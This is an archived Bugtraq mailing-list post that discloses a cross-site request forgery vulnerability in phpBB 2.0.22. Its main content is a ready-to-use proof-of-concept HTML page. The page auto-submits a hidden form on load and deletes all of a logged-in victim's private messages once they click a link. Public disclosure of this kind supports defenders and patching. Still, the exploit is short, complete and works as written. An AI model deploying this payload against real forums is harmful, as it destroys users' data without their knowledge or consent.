phpBB 2.0.22 Remote PM Delete XSRF Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpBB 2.0.22 Remote PM Delete XSRF Vulnerability
From: nbbn@xxxxxxx
Date: Wed, 23 Jan 2008 21:28:59 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: KMail/1.9.7

################################################################
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability               
by NBBN                        Type: Cross-Site Request Forgery
Founded: December 2007                                         
################################################################


An attacker can send a link via pm to a site with the follow html code to a 
victim and all victim's pm's are going to be deleted when he click the link. 
######Code##########################################################
 
<html>
  <head>
  </head>
  <body onLoad=javascript:document.xsrf.submit()>

<form action="http://[site]/phpBB2/privmsg.php?folder=inbox"; method="post" 
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">

</body>
</html>
#####################################################################


######Vuln Versions:#####################

I've tested it only on 2.0.22 but I think that all versions of 2 are vuln. 




(Sorry my bad english :-) )

Prev by Date: iDefense Security Advisory 01.22.08: IBM Tivoli PMfOSD HTTP Request Method Buffer Overflow Vulnerability
Next by Date: Re: Re: PIX Privilege Escalation Vulnerability
Previous by thread: iDefense Security Advisory 01.22.08: IBM Tivoli PMfOSD HTTP Request Method Buffer Overflow Vulnerability
Next by thread: E-SMART CART bypass
Index(es):
- Date
- Thread